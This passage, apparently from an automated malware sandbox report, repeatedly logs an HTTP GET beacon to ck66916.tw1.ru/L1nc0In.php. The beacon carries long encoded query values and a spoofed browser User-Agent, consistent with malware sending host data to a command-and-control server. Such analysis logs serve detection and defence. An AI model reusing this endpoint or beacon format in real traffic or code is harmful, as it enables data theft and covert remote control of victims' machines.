cwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERN